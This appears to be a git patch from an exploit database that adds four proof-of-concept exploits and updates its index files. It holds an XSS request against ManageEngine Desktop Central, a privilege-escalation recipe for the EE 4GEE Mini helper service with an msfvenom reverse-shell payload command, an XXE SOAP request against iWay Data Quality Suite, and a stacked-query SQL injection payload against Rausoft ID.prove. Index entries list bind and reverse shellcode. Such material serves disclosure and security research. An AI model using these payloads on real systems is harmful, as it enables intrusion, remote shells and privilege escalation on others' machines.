From 91ac09507e141d21cea6c54291412f15c311da6a Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 28 Sep 2018 05:01:59 +0000 Subject: [PATCH] DB: 2018-09-28 4 changes to exploits/shellcodes EE 4GEE Mini EE40_00_02.00_44 - Privilege Escalation iWay Data Quality Suite Web Console 10.6.1.ga - XML External Entity Injection ManageEngine Desktop Central 10.0.271 - Cross-Site Scripting Rausoft ID.prove 2.95 - 'Username' SQL injection Linux/x86 - Bind (5555/TCP) Shell Shellcode (98 bytes) Linux/x86 - Bind (5555/TCP) Shell (/bin/sh) Shellcode (98 bytes) --- exploits/java/webapps/45499.txt | 31 ++++++++++ exploits/windows/local/45501.txt | 73 +++++++++++++++++++++++ exploits/windows/webapps/45498.txt | 42 +++++++++++++ exploits/windows_x86-64/webapps/45500.txt | 20 +++++++ files_exploits.csv | 4 ++ files_shellcodes.csv | 2 +- 6 files changed, 171 insertions(+), 1 deletion(-) create mode 100644 exploits/java/webapps/45499.txt create mode 100644 exploits/windows/local/45501.txt create mode 100644 exploits/windows/webapps/45498.txt create mode 100644 exploits/windows_x86-64/webapps/45500.txt diff --git a/exploits/java/webapps/45499.txt b/exploits/java/webapps/45499.txt new file mode 100644 index 000000000..779465e47 --- /dev/null +++ b/exploits/java/webapps/45499.txt @@ -0,0 +1,31 @@ +# Exploit Title: ManageEngine Desktop Central 10.0.271 - Cross-Site Scripting +# Date: 2018-09-11 +# Exploit Author: Ismail Tasdelen +# Vendor Homepage: https://www.manageengine.com/ +# Hardware Link : https://www.manageengine.com/products/desktop-central/ +# Software : ZOHO Corp ManageEngine Desktop Central 10 +# Product Version: 10.0.271 +# Vulernability Type : Cross-site Scripting +# Vulenrability : Reflected +# CVE : CVE-2018-16833 + +# Zoho ManageEngine Desktop Central 10.0.271 has XSS via the "Features & Articles" +# search field to the /advsearch.do?SUBREQUEST=XMLHTTP URI. + +# HTTP Request Header : + +POST /advsearch.do?SUBREQUEST=XMLHTTP HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0 +Accept: */* +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Referer: http://TARGET/homePage.do?actionToCall=homePageDetails +X-Requested-With: XMLHttpRequest +Content-type: application/x-www-form-urlencoded;charset=UTF-8 +X-ZCSRF-TOKEN: =All +Content-Length: 222 +Cookie: DCJSESSIONID=34B31AEA87E0A617AB23A607C980CC07; DCJSESSIONIDSSO=0738458E311E15CD1E28F27F1DED5388; dc_customerid=All; summarypage=true; DM_SPDA_LST=1536665909495 +Connection: close + +q=">&src=sall&stab=Home&page=1&pagelimit=10&searchParamId=901&searchParamName=dm.advsearch.features.articles&id=1536666162979&isTriggerFromMenu=false&actionToCall=getSearchResults \ No newline at end of file diff --git a/exploits/windows/local/45501.txt b/exploits/windows/local/45501.txt new file mode 100644 index 000000000..e1aca9ca6 --- /dev/null +++ b/exploits/windows/local/45501.txt @@ -0,0 +1,73 @@ +# Title: EE 4GEE Mini EE40_00_02.00_44 - Privilege Escalation +# Date: 2018-09-22 +# Software Version: EE40_00_02.00_44 +# Tested on: Windows 10 64-bit and Windows 7 64-bit +# Exploit Author: Osanda Malith Jayathissa (@OsandaMalith) +# Original Advisory: http://blog.zerodaylab.com/2018/09/zerodaylab-discovers-ee-unquoted.html +# Original Write-up: https://osandamalith.com/2018/09/17/ee-4gee-mini-local-privilege-escalation-vulnerability-cve-2018-14327/ +# CVE: CVE-2018-14327 +# References +# https://www.theregister.co.uk/2018/09/19/ee_modem_vuln/ +# https://thehackernews.com/2018/09/4g-ee-wifi-modem-hack.html + +# PoC + +C:\>sc qc "Alcatel OSPREY3_MINI Modem Device Helper" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: Alcatel OSPREY3_MINI Modem Device Helper + TYPE : 110 WIN32_OWN_PROCESS (interactive) + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\Web Connecton\EE40\BackgroundService\ServiceManager.exe -start + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Alcatel OSPREY3_MINI Modem Device Helper + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + + +# Weak Folder Permissions + +C:\Program Files (x86)\Web Connecton>icacls EE40 +EE40 Everyone:(OI)(CI)(F) + NT SERVICE\TrustedInstaller:(I)(F) + NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F) + NT AUTHORITY\SYSTEM:(I)(F) + NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F) + BUILTIN\Administrators:(I)(F) + BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) + BUILTIN\Users:(I)(RX) + BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE) + CREATOR OWNER:(I)(OI)(CI)(IO)(F) + APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX) + APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE) + APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX) + APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE) + +Successfully processed 1 files; Failed processing 0 files + +C:\Program Files (x86)\Web Connecton> +C:\Program Files (x86)\Web Connecton> +C:\Program Files (x86)\Web Connecton>icacls EE40\BackgroundService +EE40\BackgroundService Everyone:(OI)(CI)(F) + Everyone:(I)(OI)(CI)(F) + NT SERVICE\TrustedInstaller:(I)(F) + NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F) + NT AUTHORITY\SYSTEM:(I)(F) + NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F) + BUILTIN\Administrators:(I)(F) + BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) + BUILTIN\Users:(I)(RX) + BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE) + CREATOR OWNER:(I)(OI)(CI)(IO)(F) + APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX) + APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE) + APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX) + APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE) + +Successfully processed 1 files; Failed processing 0 files + +# Example Payload + +msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.4 lport=443 -f exe -o rev_shell.exe \ No newline at end of file diff --git a/exploits/windows/webapps/45498.txt b/exploits/windows/webapps/45498.txt new file mode 100644 index 000000000..657214a08 --- /dev/null +++ b/exploits/windows/webapps/45498.txt @@ -0,0 +1,42 @@ +# Exploit Title: iWay Data Quality Suite Web Console 10.6.1.ga-2016-11-20 – XML External Entity Injection +# Google Dork: N/A +# Date: 2018-09-27 +# Exploit Author: Sureshbabu Narvaneni# +# Author Blog : https://nullnews.in +# Vendor Homepage: www.informationbuilders.co.uk +# Software Link: http://www.informationbuilders.co.uk/products/integrity/dqsuite +# Affected Version: 10.6.1.ga +# Category: WebApps +# Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686 +# CVE : N/A + +# Technical Description: +# iWay Data Quality Suite Web Console provides web services features. As there is no +# validation present on the web services featured by product while processing +# the user input an attacker can easily inject external entities in the SOAP request and can +# achieve the successful Remote Code Execution on the server + +# Proof Of Concept: + +> Access the iWay DQS Web Console application section. +> Create an entry for web service and form a sample SOAP request. +> Send below crafted request to the server to confirm the vulnerability + + +]> + + + + +&xxe; + + + + +> The below log shows that the web service component is vulnerable to XXE. + +root@MrR3boot:/var/www/html# tail -f /var/log/apache2/access.log +1xx.xx.xxx.xx - - [25/Sep/2018:01:13:42 -0400] "GET /xxetest HTTP/1.0" 404 +474 "-" "-" \ No newline at end of file diff --git a/exploits/windows_x86-64/webapps/45500.txt b/exploits/windows_x86-64/webapps/45500.txt new file mode 100644 index 000000000..bdb4386f6 --- /dev/null +++ b/exploits/windows_x86-64/webapps/45500.txt @@ -0,0 +1,20 @@ +# Exploit Title: Rausoft ID.prove 2.95 - 'Username' SQL injection +# Google Dork: inurl:IdproveWebclient +# Date: 2018-09-26 +# Exploit Author: Ilya Timchenko, Mercedes pay S.A. +# Vendor Homepage: https://www.idprove.de +# Software Link: https://www.idprove.de/english/index.php?option=com_content&view=article&id=17&Itemid=3 +# Version: 2.95 +# Tested on: Windows 2016 +# CVE : N/A +# Description: An issue was discovered in Rausoft ID.prove 2.95. The login page with a field "Username" +# https://<>/IdproveWebclient/Account/Login?ReturnUrl=%2fIdproveWebclient%2fEinzelsuche --data="__RequestVerificationToken=<>&Username=a&PasswordTemp=a" +# is vulnerable to the SQL injection via Microsoft SQL Server stacked queries in the Username POST parameter. +# Hypothetically, an attacker can utilize master..xp_cmdshell for the further privilege elevation. + +# SQLmap output: +# Parameter: #1* ((custom) POST) +# Type: stacked queries +# Title: Microsoft SQL Server/Sybase stacked queries (comment) + +Payload: __RequestVerificationToken=<>&Username=a';WAITFOR DELAY '0:0:5'--&PasswordTemp=a \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index b84dff0c7..93340d5b0 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10004,6 +10004,7 @@ id,file,description,date,author,type,platform,port 45479,exploits/solaris/local/45479.rb,"Solaris - 'EXTREMEPARR' dtappgather Privilege Escalation (Metasploit)",2018-09-25,Metasploit,local,solaris, 45492,exploits/windows_x86/local/45492.py,"Faleemi Desktop Software 1.8.2 - 'Device alias' Local Buffer Overflow (SEH)",2018-09-25,"Gionathan Reale",local,windows_x86, 45497,exploits/linux/local/45497.txt,"Linux - VMA Use-After-Free via Buggy vmacache_flush_all() Fastpath",2018-09-26,"Google Security Research",local,linux, +45501,exploits/windows/local/45501.txt,"EE 4GEE Mini EE40_00_02.00_44 - Privilege Escalation",2018-09-27,"Osanda Malith Jayathissa",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -40038,3 +40039,6 @@ id,file,description,date,author,type,platform,port 45487,exploits/hardware/webapps/45487.txt,"RICOH MP 305+ Printer - Cross-Site Scripting",2018-09-25,"Ismail Tasdelen",webapps,hardware, 45490,exploits/hardware/webapps/45490.txt,"RICOH MP C406Z Printer - Cross-Site Scripting",2018-09-25,"Ismail Tasdelen",webapps,hardware, 45491,exploits/php/webapps/45491.txt,"Joomla! Component Responsive Portfolio 1.6.1 - 'filter_order_Dir' SQL Injection",2018-09-25,AkkuS,webapps,php, +45498,exploits/windows/webapps/45498.txt,"iWay Data Quality Suite Web Console 10.6.1.ga - XML External Entity Injection",2018-09-27,"Sureshbabu Narvaneni",webapps,windows, +45499,exploits/java/webapps/45499.txt,"ManageEngine Desktop Central 10.0.271 - Cross-Site Scripting",2018-09-27,"Ismail Tasdelen",webapps,java, +45500,exploits/windows_x86-64/webapps/45500.txt,"Rausoft ID.prove 2.95 - 'Username' SQL injection",2018-09-27,"Ilya Timchenko",webapps,windows_x86-64, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 83e9cfe70..083fd7f4a 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -887,7 +887,7 @@ id,file,description,date,author,type,platform 44723,shellcodes/linux_x86/44723.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (113 bytes)",2018-05-23,"Matteo Malvica",shellcode,linux_x86 44738,shellcodes/linux_x86/44738.c,"Linux/x86 - Reverse (10.10.2.4:4444/TCP) Shell Shellcode (68 bytes)",2018-05-24,"Nuno Freitas",shellcode,linux_x86 44740,shellcodes/linux_x86/44740.c,"Linux/x86 - Reverse (10.0.7.17:4444/TCP) Shell (/bin/sh) Shellcode (101 Bytes)",2018-05-24,"Jonathan Crosby",shellcode,linux_x86 -44791,shellcodes/linux_x86/44791.c,"Linux/x86 - Bind (5555/TCP) Shell Shellcode (98 bytes)",2018-05-28,Luca,shellcode,linux_x86 +44791,shellcodes/linux_x86/44791.c,"Linux/x86 - Bind (5555/TCP) Shell (/bin/sh) Shellcode (98 bytes)",2018-05-28,Luca,shellcode,linux_x86 44807,shellcodes/linux_x86/44807.c,"Linux/x86 - Egghunter (0xdeadbeef) + access() + execve(/bin/sh) Shellcode (38 bytes)",2018-05-31,"Paolo Perego",shellcode,linux_x86 44808,shellcodes/linux_x86/44808.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (105 bytes)",2018-05-31,"Paolo Perego",shellcode,linux_x86 44811,shellcodes/arm/44811.c,"Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (32 bytes)",2018-05-31,"Ken Kitahara",shellcode,arm